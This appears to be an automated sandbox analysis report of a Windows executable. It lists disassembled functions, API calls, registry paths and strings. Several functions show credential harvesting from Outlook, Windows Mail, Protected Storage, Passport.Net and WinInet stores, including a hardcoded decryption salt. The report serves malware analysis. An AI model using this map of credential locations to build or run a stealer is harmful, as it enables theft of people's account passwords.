                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                            • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                            Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75D50A60,?,00000000,?,?,?,0040CF60,75D50A60), ref: 00404AB8
                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75D50A60), ref: 00404ADE
                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                            • API String ID: 745651260-375988210
                                                            • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                            • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                            Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                            Strings
                                                            • pstorec.dll, xrefs: 00403C30
                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                            • API String ID: 1197458902-317895162
                                                            • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                            • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                            Function 0044B49F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                            • String ID: h4ND
                                                            • API String ID: 3662548030-3825183422
                                                            • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                            • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                            • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                            • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                            Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                            • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                            • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                            • API String ID: 2768085393-1693574875
                                                            • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                            • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                            • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                            • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                            Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0044430B
                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                            • memset.MSVCRT ref: 00444379
                                                            • memset.MSVCRT ref: 00444394
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                            • strlen.MSVCRT ref: 004443DB
                                                            • _strcmpi.MSVCRT ref: 00444401
                                                            Strings
                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                            • Store Root, xrefs: 004443A5
                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                            • API String ID: 832325562-2578778931
                                                            • Opcode ID: 29f36c30459babb599eafc743357add432badc7eb4b16160b2380ad1a198b008
                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                            • Opcode Fuzzy Hash: 29f36c30459babb599eafc743357add432badc7eb4b16160b2380ad1a198b008
                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                            Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                            APIs
                                                            • memset.MSVCRT ref: 0040F567
                                                            • memset.MSVCRT ref: 0040F57F
                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                            • String ID:
                                                            • API String ID: 2012582556-3916222277
                                                            • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                            • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                            Function 004086E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 155COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 331 4086e0-408704 call 4045db 334 4088f7-408906 call 404656 331->334 335 40870a-408716 331->335 337 408718-40872b CredEnumerateW 335->337 338 40872d-408731 335->338 337->338 338->334 341 408737-408764 wcslen 338->341 343 40876a 341->343 344 4088ef-4088f3 LocalFree 341->344 345 40876f-408774 343->345 344->334 345->344 346 40877a-40879e wcsncmp 345->346 347 4087a4-4087bb 346->347 348 4088dd-4088e9 346->348 347->347 349 4087bd-4087ee call 40466b call 404734 347->349 348->344 348->345 354 4088d1-4088d8 call 404785 349->354 355 4087f4-40880c call 4047a5 349->355 354->348 355->354 359 408812-408838 memset 355->359 360 40883a 359->360 361 40883c-4088a9 memcpy wcschr 359->361 360->361 362 4088b7-4088cb LocalFree 361->362 363 4088ab-4088b3 361->363 362->354 363->362
                                                            APIs
                                                              • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                            • wcslen.MSVCRT ref: 0040874A
                                                            • wcsncmp.MSVCRT ref: 00408794
                                                            • memset.MSVCRT ref: 0040882A
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                            • wcschr.MSVCRT ref: 0040889F
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                            • LocalFree.KERNELBASE(?), ref: 004088F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$FreeLocal$LibraryLoadmemcpymemsetwcschrwcslenwcsncmp
                                                            • String ID: J$Microsoft_WinInet
                                                            • API String ID: 3950215071-260894208
                                                            • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                            • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                            • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                            • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                            Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 365 4037ca-40381c memset * 2 call 444551 368 4038e2-4038e5 365->368 369 403822-403882 call 4021b6 call 406f06 * 2 strchr 365->369 376 403884-403895 _mbscpy 369->376 377 403897-4038a2 strlen 369->377 378 4038bf-4038dd _mbscpy call 4023e5 376->378 377->378 379 4038a4-4038bc sprintf 377->379 378->368 379->378
                                                            APIs
                                                            • memset.MSVCRT ref: 004037EB
                                                            • memset.MSVCRT ref: 004037FF
                                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                            • strchr.MSVCRT ref: 0040386E
                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                            • strlen.MSVCRT ref: 00403897
                                                            • sprintf.MSVCRT ref: 004038B7
                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                            • String ID: %s@yahoo.com
                                                            • API String ID: 317221925-3288273942
                                                            • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                            • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                            Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 381 4034e4-403544 memset * 2 call 410b1e 384 403580-403582 381->384 385 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 381->385 385->384
                                                            APIs
                                                            • memset.MSVCRT ref: 00403504
                                                            • memset.MSVCRT ref: 0040351A
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                            • _mbscat.MSVCRT ref: 0040356D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscatmemset$Close_mbscpystrlen
                                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                                            • API String ID: 3071782539-966475738
                                                            • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                            • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                            Function 0040F6E2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 390 40f6e2-40f70a call 40466b call 4045db 395 40f710-40f717 call 404734 390->395 396 40f7e9-40f801 call 404656 call 404785 390->396 395->396 401 40f71d-40f72e CredReadA 395->401 401->396 403 40f734-40f73a 401->403 405 40f740-40f743 403->405 406 40f7e5 403->406 405->406 407 40f749-40f759 405->407 406->396 408 40f75a-40f770 407->408 408->408 409 40f772-40f795 call 4047a5 408->409 412 40f7e2 409->412 413 40f797-40f7b6 WideCharToMultiByte 409->413 412->406 414 40f7b8-40f7c6 strlen 413->414 415 40f7d9-40f7dc LocalFree 413->415 414->415 416 40f7c8-40f7d8 _mbscpy 414->416 415->412 416->415
                                                            APIs
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                            • strlen.MSVCRT ref: 0040F7BE
                                                            • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                            • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                            • String ID: Passport.Net\*
                                                            • API String ID: 4000595657-3671122194
                                                            • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                            • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                            • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                            • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                            Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 417 40ccd7-40cd06 ??2@YAPAXI@Z 418 40cd08-40cd0d 417->418 419 40cd0f 417->419 420 40cd11-40cd24 ??2@YAPAXI@Z 418->420 419->420 421 40cd26-40cd2d call 404025 420->421 422 40cd2f 420->422 423 40cd31-40cd57 421->423 422->423 425 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 423->425 426 40cd59-40cd60 DeleteObject 423->426 426->425
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
